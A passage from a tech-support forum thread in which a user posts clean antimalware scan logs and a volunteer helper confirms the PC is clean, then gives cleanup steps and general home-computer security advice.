¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 8 ¤¤¤
[PUM.HomePage] HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome  -> Not selected
[PUM.HomePage] HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome  -> Not selected
[PUM.SearchPage] HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> Not selected
[PUM.SearchPage] HKEY_USERS\S-1-5-21-151212660-612849681-608699423-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> Not selected
[PUM.SearchPage] HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> Not selected
[PUM.StartMenu] HKEY_USERS\S-1-5-21-151212660-612849681-608699423-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Not selected
[PUM.DesktopIcons] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Not selected
[PUM.DesktopIcons] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Not selected

¤¤¤ Tasks : 1 ¤¤¤
[Suspicious.Path] 0814tbUpdateInfo.job -- C:\ProgramData\Avg_Update_0814tb\0814tb_{A18B207A-001B-4807-9E21-92BFB36FCAC8}.exe ( /SETINFO /CMPID=0814tb /INFORETRY=3) -> Deleted

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 1 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1       localhost

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST250DM0 ST250DM000-1BD14 SCSI Disk Device +++++
--- User ---
[MBR] a4cf36163e6cac54e74619468745956d
[BSP] 7052c9aac68248176f8c11617c635307 : HP MBR Code
Partition table:
0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 19016 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 39026688 | Size: 219416 MB
User = LL1 ... OK
Error reading LL2 MBR! ([18] The program issued a command but the command length is incorrect. )

============================================
RKreport_SCN_10132014_083921.log

 

*******************  Step 5 - TDSSKiller  *************************  (This log is HUGE, I am not able to upload it all. No errors are identified in it)

08:47:24.0724 0x0f3c  TDSS rootkit removing tool 3.0.0.40 Jul 10 2014 12:37:58
08:47:25.0020 0x0f3c  ============================================================
08:47:25.0020 0x0f3c  Current date / time: 2014/10/13 08:47:25.0020
08:47:25.0020 0x0f3c  SystemInfo:
08:47:25.0020 0x0f3c
08:47:25.0020 0x0f3c  OS Version: 6.1.7601 ServicePack: 1.0
08:47:25.0020 0x0f3c  Product type: Workstation
08:47:25.0020 0x0f3c  ComputerName: ABASKINS
08:47:25.0020 0x0f3c  UserName: abaskins
08:47:25.0020 0x0f3c  Windows directory: C:\Windows
08:47:25.0020 0x0f3c  System windows directory: C:\Windows
08:47:25.0020 0x0f3c  Processor architecture: Intel x86
08:47:25.0020 0x0f3c  Number of processors: 4
08:47:25.0020 0x0f3c  Page size: 0x1000
08:47:25.0020 0x0f3c  Boot type: Normal boot
08:47:25.0020 0x0f3c  ============================================================
08:47:25.0020 0x0f3c  BG loaded
08:47:25.0891 0x0f3c  System UUID: {604CABD2-AD3E-33F0-5E7B-F307DFC3EC30}
08:47:26.0948 0x0f3c  Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 ( 232.89 Gb ), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
08:47:27.0089 0x0f3c  ============================================================
08:47:27.0089 0x0f3c  \Device\Harddisk0\DR0:
08:47:27.0104 0x0f3c  MBR partitions:
08:47:27.0104 0x0f3c  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x14000, BlocksNum 0x2524000
08:47:27.0104 0x0f3c  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x2538000, BlocksNum 0x1AC8C000
08:47:27.0104 0x0f3c  ============================================================
08:47:27.0136 0x0f3c  C: <-> \Device\Harddisk0\DR0\Partition2
08:47:27.0136 0x0f3c  ============================================================
08:47:27.0136 0x0f3c  Initialize success
08:47:27.0136 0x0f3c  ============================================================
08:48:35.0221 0x08d4  ============================================================
08:48:35.0221 0x08d4  Scan started
08:48:35.0221 0x08d4  Mode: Manual; SigCheck; TDLFS;
08:48:35.0221 0x08d4  ============================================================
08:48:35.0221 0x08d4  KSN ping started
08:49:09.0588 0x08d4  KSN ping finished: true
08:49:13.0114 0x08d4  ================ Scan system memory ========================
08:49:13.0114 0x08d4  System memory - ok
08:49:13.0114 0x08d4  ================ Scan services =============================
08:52:53.0948 0x1528  AV detected via SS2: ESET NOD32 Antivirus 7.0, C:\Program Files\ESET\ESET NOD32 Antivirus\ecmd.exe ( 7.0.302.0 ), 0x42000 ( disabled : updated )
08:52:53.0948 0x1528  Win FW state via NFP2: enabled
08:53:06.0943 0x1528  ============================================================
08:53:06.0943 0x1528  Scan finished
08:53:06.0943 0x1528  ============================================================
08:53:06.0943 0x1520  Detected object count: 0
08:53:06.0943 0x1520  Actual detected object count: 0

 

*******************  Step 6 - Malware Bytes  *************************

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/13/2014
Scan Time: 8:57:55 AM
Logfile: MBLog.txt
Administrator: Yes

Version: 2.00.2.1012
Malware Database: v2014.10.13.03
Rootkit Database: v2014.10.11.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x86
File System: NTFS
User: abaskins

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 289400
Time Elapsed: 5 min, 40 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

 

*******************  Step 7 - Hitman Pro  *************************

 

HitmanPro 3.7.9.225
www.hitmanpro.com
   Computer name . . . . : ABASKINS
   Windows . . . . . . . : 6.1.1.7601.X86/4
   User name . . . . . . : ABASKINS\abaskins
   UAC . . . . . . . . . : Enabled
   License . . . . . . . : Free
   Scan date . . . . . . : 2014-10-13 09:09:09
   Scan mode . . . . . . : Normal
   Scan duration . . . . : 4m 34s
   Disk access mode  . . : Direct disk access (SRB)
   Cloud . . . . . . . . : Internet
   Reboot  . . . . . . . : No
   Threats . . . . . . . : 0
   Traces  . . . . . . . : 4
   Objects scanned . . . : 2,386,296
   Files scanned . . . . : 112,177
   Remnants scanned  . . : 1,603,287 files / 670,832 keys
Suspicious files ____________________________________________________________
   C:\Users\abaskins\Desktop\FRST.exe
      Size . . . . . . . : 1,101,312 bytes
      Age  . . . . . . . : 4.0 days (2014-10-09 07:57:40)
      Entropy  . . . . . : 8.0
      SHA-256  . . . . . : 4290A6B94C5AC0A59D050B17657E648FB73D3D2110A4916B4E1013DE8B733069
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
          0.0s C:\Users\abaskins\Desktop\FRST.exe
          0.0s C:\Users\abaskins\Desktop\FRST.exe
          0.0s C:\Users\abaskins\Desktop\FRST.exe
          0.0s C:\Users\abaskins\Desktop\FRST.exe
          0.0s C:\Users\abaskins\Desktop\FRST.exe
          0.0s C:\Users\abaskins\Desktop\FRST.exe
          0.0s C:\Users\abaskins\Desktop\FRST.exe
   C:\Users\abaskins\Downloads\Bleeping Computer Downloads\FarBar Recovery Scan Tool 32-Bit\FRST.exe
      Size . . . . . . . : 1,101,312 bytes
      Age  . . . . . . . : 4.1 days (2014-10-09 07:55:56)
      Entropy  . . . . . : 8.0
      SHA-256  . . . . . : 4290A6B94C5AC0A59D050B17657E648FB73D3D2110A4916B4E1013DE8B733069
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
          0.0s C:\Users\abaskins\Downloads\Bleeping Computer Downloads\FarBar Recovery Scan Tool 32-Bit\FRST.exe
          0.0s C:\Users\abaskins\Downloads\Bleeping Computer Downloads\FarBar Recovery Scan Tool 32-Bit\FRST.exe
          0.0s C:\Users\abaskins\Downloads\Bleeping Computer Downloads\FarBar Recovery Scan Tool 32-Bit\FRST.exe

Potential Unwanted Programs _________________________________________________
   ask.com
   C:\Users\abaskins\AppData\Local\Google\Chrome\User Data\Default\Web Data

Cookies _____________________________________________________________________
   C:\Users\abaskins\AppData\Local\Google\Chrome\User Data\Default\Cookies:doubleclick.net

 

*******************  Step 8 - Security Check  *************************

 

 Results of screen317's Security Check version 0.99.88
 Windows 7 Service Pack 1 x86 (UAC is enabled)
 Internet Explorer 11
``````````````Antivirus/Firewall Check:``````````````
 Windows Firewall Enabled!
ESET NOD32 Antivirus 7.0 
 Antivirus up to date! 
`````````Anti-malware/Other Utilities Check:`````````
 CCleaner   
 Adobe Reader XI
 Google Chrome 36.0.1985.143
 Google Chrome 37.0.2062.124
 Google Chrome plugins...
````````Process Check: objlist.exe by Laurent````````
 ESET NOD32 Antivirus egui.exe
 ESET NOD32 Antivirus ekrn.exe
 Malwarebytes Anti-Malware mbamservice.exe
 Malwarebytes Anti-Malware mbam.exe
 Malwarebytes Anti-Malware mbamscheduler.exe 
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C: 5%
````````````````````End of Log``````````````````````

 

*****************************************************************************

THANKS Georgi! Looking forward to your reply!

Best,

Scott Stevenson



#11 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,285 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:04 PM

Posted 14 October 2014 - 04:31 AM

Hello Scott,

 

I am sorry about the delay. I had a busy day at the office. Thanks for the beers by the way. beer11.gif

The logs are clean! :)

 

Nicely done ! :bananas: This is the end of our journey if you don't have any more questions.
Thank you for following my instructions perfectly. smile.png
I have some final words for you.
All Clean !
Your machine appears to be clean, please take the time to read below on how to secure the machine and take the necessary steps to keep it Clean.

 

 

 

STEP 1 - UPDATING TASKS

 

 

  • The securitycheck log shows that your critical programs are up to date but It is possible for other programs on your computer to have security vulnerability that can allow malware to infect you.
  • Therefore, it is also a good idea to check for the latest versions of commonly installed applications that are regularly patched to fix vulnerabilities.
  • You can check these by visiting Secunia Software Inspector or you can use the following application for this purpose PatchMyPC

 

 
Visit Microsoft's Windows Update Site Frequently

 

  • It is important that you visit Windows Update regularly.
  • This will ensure your computer has always the latest security updates available installed on your computer.
  • If there are new updates to install, install them immediately, reboot your computer, and revisit the site until there are no more critical updates.

 

 

STEP 2 CLEANUP
 

 
To remove all of the tools we used and the files and folders they created, please do the following:

 

 

Click on Start => now type in ComboFix /Uninstall into the serach-box and click OK.
Note the space between the X and the /Uninstall, it needs to be there.

 

  • Next please download Delfix.exe by Xplode and save it to your desktop.
  • Please start it and check the box next to "Remove disinfection tools" and click on the run button.
  • The tool will delete itself once it finishes.

 

Note: If any tool, file, log file or folder (belonging to the program we have used) hasn't been deleted, please delete it manually.


 
STEP 3 SECURITY ADVICES


Change all your passwords !


Since your computer was infected for peace of mind, I would however advise you that all your passwords be changed immediately including those for bank accounts, credit cards and home loans, PIN codes etc)!! (just in case).

 

If you're storing password in the browser to access websites than they are non encrypted well. Only if you use Firefox with master password protection activated provide better security...then you can add Secure Login to prevent Java and other exploits when log-in.

 

So I strongly recommend to change as much password as possible. Many of the modern malware samples have backdoor abilities and can steal confidential information from the compromised computer. Also you should check for any suspicious transactions if such occur. If you find out that you have been victim to fraud contact your bank or the appropriate institution for assistance.
Use different passwords for all your accounts. Also don't use easy passwords such as your favorite teams, bands or pets because this will allow people to guess your password.
You can use Password Generator - Norton Identity Safe to create random passwords and then install an application like KeePass Password Safe to store them for easy access.If you do Online Banikng please read this article: Online Banking Protection Against Identity Theft
 

 

 

Keep your antivirus software turned on and up-to-date

 

  • Make sure that you keep it updated
  • New viruses come out every minute, so it is essential that you have the latest signatures for your antivirus program to provide you with the best possible protection from malicious software.
  • Note: You should only have one antivirus installed at a time. Having more than one antivirus program installed at once is likely to cause conflicts and may well decrease your overall protection as well as impairing the performance of your PC.
  • Note: You should scan your computer with an antimalware program like Malwarebytes' Anti-Malware on a regular basis just as you would an antivirus software.
  • Be sure to check for and download any definition updates prior to performing a scan.
  • Also keep in mind that MBAM is not a replacement for antivirus software, it is meant to complement the protection provided by a full antivirus product and is designed to detect the threats that are missed by most antivirus software.

 

 

Install HIPS based software if needed (or use Limited Account with UAC enabled)

 

I usually recommend to users to install HIPS based software (like Comodo Firewall, OnlineArmor, PrivateFirewall or Outpost Security Suite FREE) to prevent an unknown malware from gaining access but since you use ESET NOD32 Antivirus you can skip this step.

ESET NOD32 Antivirus is not only antivirus software, but also includes HIPS and other proactive features.
More information about HIPS can be found here: What is Host Intrusion Prevention System (HIPS) and how does it work?

 

If these kind of programs are difficult for you to use then you can (disable the built-in HIPS) and create a standard user account with UAC enabled. If you need administrative privileges to perform some tasks, then you can use Run As or log on as the administrator account for that specific task.

 

 

 

Be prepared for CryptoLocker and similar threats:


CryptoLocker Ransomware Information Guide and FAQ
Cryptolocker Ransomware: What You Need To Know
New CryptoLocker Ransomware Variant Spread Through Yahoo Messenger
CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ
CryptoWall - A new ransomware from the creators of CryptoDefense

Analysis of ‘TorrentLocker’ – A New Strain of Ransomware Using Components of CryptoLocker and CryptoWall

 

 

Since the prevention is better than cure you can use gpedit built-in Windows or CryptoPrevent (described in the first link) to secure the PC against these lockers.
Another way is to use Comodo Internet Security and to add all local disks to Protected Files and Folders (if you decide to install it). Also Comodo Internet Security offers a sandbox that will help you prevent being infected. If you like to stick with another antivirus software then you can install Sandboxie.

 

You may want to check Malwarebytes Anti-Exploit and add install it to be safe when surfing the net. It work with the most popular browsers and it is very effective. See the article here.

 

HitmanPro.Alert.CryptoGuard provides similar protection but it failed in the latest test here. However the tool is still under development and will be improved a lot in the future so you can keep an eye on it and its progress.

 

Note: However keep in mind that HitmanPro.Alert is not fully compatible with Malwarebytes' Anti-Exploit and you should choose only one between both of them.

 

EMET and VoodooShield are another great tools which should lock the computer against exploits but they are too confusing to use for home users. However you can take a look at them if you want.
 
I would not install them all because they could render your pc unusable and will slow it down like a turtle.
Having more than one "real-time" program installed at once is likely to cause conflicts and may well decrease your overall protection as well as impairing the performance of your PC.

 

 

Practice Safe Internet


One of the main reasons people get infected in the first place is that they are not practicing Safe Internet. You practice Safe Internet when you educate yourself on how to properly use the Internet through the use of security tools and good practice. Knowing how you can get infected and what types of files and sites to avoid will be the most crucial step in keeping your computer malware free. The reality is that the majority of people who are infected with malware are ones who click on things they shouldn't be clicking on. Whether these things are files or sites it doesn't really matter. If something is out to get you, and you click on it, it most likely will.  Below are a list of simple precautions to take to keep your computer clean and running securely:

  • If you receive an attachment from someone you do not know, DO NOT OPEN IT! Simple as that.  Opening attachments from people you do not know is a very common method for viruses or worms to infect your computer.
  • .exe, .com, .bat, .pif, .scr, .cmd or .vbs do not open the attachment unless you know for a fact that it is clean.  For the casual computer user, you will almost never receive a valid attachment of this type.
  • If you receive an attachment from someone you know, and it looks suspicious, then it probably is.  The email could be from someone you know infected with a malware that is trying to infect everyone in their address book.
  • If you are browsing the Internet and a popup appears saying that you are infected, ignore it!. These are, as far as I am concerned, scams that are being used to scare you into purchasing a piece of software. For an example of these types of popups, or Foistware, you should read this article:
    Foistware, And how to avoid it. There are also programs that disguise themselves as Anti-Spyware or security products but are instead scams.  For a list of these types of programs we recommend you visit this link: About Malwares, Rogues, Scarewares, SmitfraudFix
  • Another tactic to fool you on the web is when a site displays a popup that looks like a normal Windows message  or alert. When you click on them, though, they instead bring you to another site that is trying to push a product on you.  We suggest that you close these windows by clicking on the X instead of the OK button. Alternatively, you can check to see if it's a real alert by right-clicking on the window.  If there is a menu that comes up saying Add to Favorites... you know it's a fake.
  • Do not go to adult sites. I know this may bother some of you, but the fact is that a large amount of malware is pushed through these types of sites. I am not saying all adult sites do this, but a lot do.
  • When using an Instant Messaging program be cautious about clicking on links people send to you. It is not uncommon for infections to send a message to everyone in the infected person's contact list that contains a link to an infection. Instead when you receive a message that contains a link, message back to the person asking if it is legit before you click on it.
  • Stay away from Warez and Crack sites! In addition to the obvious copyright issues, the downloads from these sites are typically overrun with infections. Avoid using cracks and unknown programs from sources you don't trust. There are MANY alternative open-source applications. Malware writers just love cracks and keygens, and will often attach malicious code into them. By using cracks and/or keygens, you are asking for problems. So my advice is - stay away from them!
  • Be careful of what you download off of web sites and Peer-2-Peer networks. Some sites disguise malware as legitimate software to trick you into installing them and Peer-2-Peer networks are crawling with it. If you want to download a piece of software a from a site, and are not sure if they are legitimate, you can use McAfee Siteadvisor to look up info on the site. Note: skip this advice if your antivirus have a Web Guard.
  • DO NOT INSTALL any software without first reading the End User License Agreement, otherwise known as the EULA. A tactic that some developers use is to offer their software for free, but have spyware and other programs you do not want bundled with it. This is where they make their money. By reading the agreement there is a good chance you can spot this and not install the software.
  • You may want to install unchecky to prevent adware bundled into many free programs to install.

 

 

Tweak your browsers
 

MOZILLA FIREFOX

 

To prevent further infections be sure to install the following add-ons NoScript and AdBlock Plus
 

Adblock Plus hides all those annoying (and potentially dangerous) advertisements on websites that try and tempt you to buy or download something. AdBlock not only speeds up your browsing and makes it easier on your eyes, but also makes it safer.

 

 

Adblock Plus can be found here.
 
Do not add to many filters subscriptions because it will slow down your browser startup time.
 
erfxUim.jpg
 

NoScript is only for advanced users as it blocks all the interactive parts of a webpage, such as login options. Obviously you wouldn’t want to block your ability to log on to your internet banking or your webmail, but thankfully you can tell NoScript to allow certain websites and block others. This is very useful to ensure that the website you’re visiting is not trying to tempt you to interact with another, more dangerous website.

 

 

NoScript can be found here
 
You can find the optimal settings here
A tutorial on how to use it can be found here

 

 

Google Chrome

 
If you like Google Chrome there are many similar extensions for this browser as well. Since I am not a Google Chrome user I can't tell you which of them are good and how they work. You should find out by yourself.

However Google Chrome can block a lot of unknown malware because of his sandbox.Beware of the fact that Google Chrome doesn't provide master password protection for your saved in the browser passwords. Check this out: Google Chrome security flaw offers unrestricted password access


 
For Internet Explorer 9/10/11 read the articles below:


Security and privacy features in Internet Explorer 9
Enhanced Protected Mode
Use Tracking Protection in Internet Explorer
Security in Internet Explorer 10

 

 
 
Immunize your browsers with SpywareBlaster 5 and Spybot Search and Destroy 1.6 and MVPS HOSTS.

Also you can change your DNS settings 8.26.56.26 and 8.20.247.20 to use Comodo Secure DNS for free (to prevent phishing attacks)

 

 

Make the extensions for known file types visible:
 
 
Be wary of files with a double extension such as jpg.exe. As a default setting, Windows often hides common file extensions, meaning that a program like image.jpg.exe will appear to you as simply image.jpg. Double extensions exploit this by hiding the second, dangerous extension and reassuring you with the first one.Check this out - Show or hide file name extensions.


 
Disable Autorun and Windows Scripting Host:
 
 
It's a good idea to disable the Autorun functionality using the following tool to prevent spreading of the infections from USB flash drives.

 

If you don't use any script files then you can go ahead and disable Windows Scripting Host using the tool provided by Symantec - NoScript.exe. Simple download and run it and click on the Disable button and reboot the computer. If you need to run any js. or vbs scripts at a later stage you should run NoScript again and select Enable, then reboot the computer.
 

 

 
Create an image of your system (you can use the built-in Windows software as well if you prefer)

  • Now when your pc is malware free it is a good idea to do a backup of all important files just in case something happens it.
  • Macrium Reflect is very good choice that enables you to create an image of your system drive which can be restored in case of problems.
  • The download link is here.
  • The tutorial on how to create an system image can be found here.
  • The tutorial on how to restore an system image can be found here.
  • Be sure to read the tutorial first.

 

 

Note: Also I noticed that you have CCleaner installed. The tool is safe as long as you don't use the built-in registry cleaner! If you don’t know how to use it, you may cause irreparable damage to your system.

 

 

Follow this list and your potential for being infected again will reduce dramatically.

 

Safe Surfing ! :)

 

Regards,

Georgi


Edited by B-boy/StyLe/, 14 October 2014 - 04:51 AM.
Added a note about CCleaner!

cXfZ4wS.png


#12 stevesls

stevesls
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Alabama
  • Local time:12:04 PM

Posted 14 October 2014 - 08:19 AM

Thank you so much Georgi!  I will follow your great suggestions.

 

Kudos to you and the BleepingComputer.com "Malware Response Team"!  While I try to keep up with the current developments in computer security, you and your fellow colleagues maintain a position at the cutting edge, and can be counted on for exceptional depth and breadth of knowledge, supplemented with the most effective and appropriate tools for identifying and removing viruses / mal-ware.  I was very impressed with your exceptional responsiveness and clear / easy to follow, step-by-step instructions as you guided me through the process of removing the troublesome DLLHOST.EXE replication problem.  

 

BleepingComputer has my highest recommendation and will be my first choice if I ever encounter another infestation that can't be identified and removed with the standard tools in my "toolbox".

 

All the best! :thumbup2:

Scott Stevenson



#13 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,285 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:04 PM

Posted 14 October 2014 - 03:13 PM

Hi,

 

You're more than welcome! I am glad I could help!

Thanks for the kind words. I am starting to blush and turn red. I (we) appreciate them! :)

Wish you a nice weekend and take care.

 

 

 

Regards,

Georgi


cXfZ4wS.png


#14 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,285 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:04 PM

Posted 15 October 2014 - 12:11 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.

cXfZ4wS.png





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users